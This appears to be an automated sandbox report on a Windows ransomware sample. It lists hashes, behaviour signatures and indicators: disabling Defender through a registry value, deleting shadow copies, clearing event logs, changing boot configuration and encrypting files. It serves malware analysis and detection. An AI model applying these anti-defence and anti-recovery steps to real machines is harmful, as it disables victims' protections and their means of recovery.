Analysis
-
max time kernel
137s -
max time network
127s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 14:43
Static task
static1
Behavioral task
behavioral1
Sample
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe
-
Size
3.8MB
-
MD5
cc827025f0fc7997097626f534635501
-
SHA1
9434cc56f7e8b0a246dbc3a799e7850cdb87c9c5
-
SHA256
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3
-
SHA512
855159b33f3fb2d859dcfd5468d1bfd5b3b2a6258c80a6bc0e1b98ca38b8e8c3161893307c0726f611dc4709c734c89931893db9b6529353257e916e589c5d8c
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1904 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 424 bcdedit.exe 3252 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1849_32x32x32.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\es-ES\TipRes.dll.mui 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\FrequentOfficeUpdateSchedule.xml.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_EAAAABAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\BooleanMerge.scale-180.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\976_24x24x32.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\sheep.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_LAAAACwAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\ScanIcon_contrast-black.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\mask\12c.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\cy_60x42.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\az_16x11.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-48_altform-unplated_contrast-white.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Trial-pl.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-20.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\AppxSignature.p7x 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-96_altform-unplated_contrast-white.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-400.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2_20x20x32.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailWideTile.scale-400.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud_retina.png.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_MAAAADAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c\SkypeApp\Assets\Images\image_placeholder.scale-125.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageLargeTile.scale-200_contrast-white.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\SurfaceProfiles\canvas12oz_512x512_nm.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-colorize.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_GgAAABoAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_PgAAAD4AAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\sendforsignature.svg.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\ui-strings.js.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ppd.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_NAAAADQAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallLogo.scale-100_contrast-black.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-100.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_scan_logo.svg.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\ui-strings.js.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_LgAAAC4AAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\ui-strings.js.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_CAAAAAgAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Trial-pl.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\976_32x32x32.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\in_60x42.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\lr_60x42.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.png.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosWideTile.contrast-white_scale-100.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-125.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarSmallTile.scale-400.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AgAAAAIAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\am_get.svg.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\mask_corners_king.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookMedTile.scale-400.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\eg_16x11.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ant-javafx.jar.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_AAAAAAAAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Trial-pl.xrm-ms.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_LAAAACwAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe\resources.pri 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\toast.dualsim2.scale-200.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\DailyChallenges\tile1_diamond.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\sa_60x42.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_BAAAAAQAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\ResetCoord.scale-100.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_contrast-white.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-150.png 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation.png.vEahxNW0Yq6u6rY3kfgy4EHS030wohKYgAi-P2eGrRH_KAAAACgAAAA0.vl6ia 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 5056 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exepid process 640 powershell.exe 640 powershell.exe 640 powershell.exe 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 2832 wevtutil.exe Token: SeBackupPrivilege 2832 wevtutil.exe Token: SeSecurityPrivilege 4176 wevtutil.exe Token: SeBackupPrivilege 4176 wevtutil.exe Token: SeSecurityPrivilege 4296 wevtutil.exe Token: SeBackupPrivilege 4296 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4212 wmic.exe Token: SeSecurityPrivilege 4212 wmic.exe Token: SeTakeOwnershipPrivilege 4212 wmic.exe Token: SeLoadDriverPrivilege 4212 wmic.exe Token: SeSystemProfilePrivilege 4212 wmic.exe Token: SeSystemtimePrivilege 4212 wmic.exe Token: SeProfSingleProcessPrivilege 4212 wmic.exe Token: SeIncBasePriorityPrivilege 4212 wmic.exe Token: SeCreatePagefilePrivilege 4212 wmic.exe Token: SeBackupPrivilege 4212 wmic.exe Token: SeRestorePrivilege 4212 wmic.exe Token: SeShutdownPrivilege 4212 wmic.exe Token: SeDebugPrivilege 4212 wmic.exe Token: SeSystemEnvironmentPrivilege 4212 wmic.exe Token: SeRemoteShutdownPrivilege 4212 wmic.exe Token: SeUndockPrivilege 4212 wmic.exe Token: SeManageVolumePrivilege 4212 wmic.exe Token: 33 4212 wmic.exe Token: 34 4212 wmic.exe Token: 35 4212 wmic.exe Token: 36 4212 wmic.exe Token: SeIncreaseQuotaPrivilege 4324 wmic.exe Token: SeSecurityPrivilege 4324 wmic.exe Token: SeTakeOwnershipPrivilege 4324 wmic.exe Token: SeLoadDriverPrivilege 4324 wmic.exe Token: SeSystemProfilePrivilege 4324 wmic.exe Token: SeSystemtimePrivilege 4324 wmic.exe Token: SeProfSingleProcessPrivilege 4324 wmic.exe Token: SeIncBasePriorityPrivilege 4324 wmic.exe Token: SeCreatePagefilePrivilege 4324 wmic.exe Token: SeBackupPrivilege 4324 wmic.exe Token: SeRestorePrivilege 4324 wmic.exe Token: SeShutdownPrivilege 4324 wmic.exe Token: SeDebugPrivilege 4324 wmic.exe Token: SeSystemEnvironmentPrivilege 4324 wmic.exe Token: SeRemoteShutdownPrivilege 4324 wmic.exe Token: SeUndockPrivilege 4324 wmic.exe Token: SeManageVolumePrivilege 4324 wmic.exe Token: 33 4324 wmic.exe Token: 34 4324 wmic.exe Token: 35 4324 wmic.exe Token: 36 4324 wmic.exe Token: SeIncreaseQuotaPrivilege 4324 wmic.exe Token: SeSecurityPrivilege 4324 wmic.exe Token: SeTakeOwnershipPrivilege 4324 wmic.exe Token: SeLoadDriverPrivilege 4324 wmic.exe Token: SeSystemProfilePrivilege 4324 wmic.exe Token: SeSystemtimePrivilege 4324 wmic.exe Token: SeProfSingleProcessPrivilege 4324 wmic.exe Token: SeIncBasePriorityPrivilege 4324 wmic.exe Token: SeCreatePagefilePrivilege 4324 wmic.exe Token: SeBackupPrivilege 4324 wmic.exe Token: SeRestorePrivilege 4324 wmic.exe Token: SeShutdownPrivilege 4324 wmic.exe Token: SeDebugPrivilege 4324 wmic.exe Token: SeSystemEnvironmentPrivilege 4324 wmic.exe Token: SeRemoteShutdownPrivilege 4324 wmic.exe Token: SeUndockPrivilege 4324 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3584 wrote to memory of 3956 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3584 wrote to memory of 3956 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3956 wrote to memory of 8 3956 net.exe net1.exe PID 3956 wrote to memory of 8 3956 net.exe net1.exe PID 3584 wrote to memory of 4292 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3584 wrote to memory of 4292 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 4292 wrote to memory of 4180 4292 net.exe net1.exe PID 4292 wrote to memory of 4180 4292 net.exe net1.exe PID 3584 wrote to memory of 4208 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3584 wrote to memory of 4208 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 4208 wrote to memory of 4372 4208 net.exe net1.exe PID 4208 wrote to memory of 4372 4208 net.exe net1.exe PID 3584 wrote to memory of 4452 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3584 wrote to memory of 4452 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 4452 wrote to memory of 4344 4452 net.exe net1.exe PID 4452 wrote to memory of 4344 4452 net.exe net1.exe PID 3584 wrote to memory of 4352 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3584 wrote to memory of 4352 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 4352 wrote to memory of 788 4352 net.exe net1.exe PID 4352 wrote to memory of 788 4352 net.exe net1.exe PID 3584 wrote to memory of 4484 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3584 wrote to memory of 4484 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 4484 wrote to memory of 3748 4484 net.exe net1.exe PID 4484 wrote to memory of 3748 4484 net.exe net1.exe PID 3584 wrote to memory of 3352 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3584 wrote to memory of 3352 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3352 wrote to memory of 4248 3352 net.exe net1.exe PID 3352 wrote to memory of 4248 3352 net.exe net1.exe PID 3584 wrote to memory of 3280 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3584 wrote to memory of 3280 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3280 wrote to memory of 524 3280 net.exe net1.exe PID 3280 wrote to memory of 524 3280 net.exe net1.exe PID 3584 wrote to memory of 644 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 3584 wrote to memory of 644 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe net.exe PID 644 wrote to memory of 1020 644 net.exe net1.exe PID 644 wrote to memory of 1020 644 net.exe net1.exe PID 3584 wrote to memory of 956 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 956 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 1236 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 1236 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 1376 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 1376 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 1572 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 1572 3584 